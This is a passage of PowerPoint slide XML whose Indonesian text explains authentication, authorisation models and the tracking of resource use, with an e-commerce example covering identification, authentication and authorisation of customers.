            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otorisasi-menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak-hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak-hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskresioner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak-hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperingatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs e-commerce dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Identifikasi-memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penagihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembayaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>curang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi-memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penagihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otorisasi-aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemesanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembayaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang valid. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>loyalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
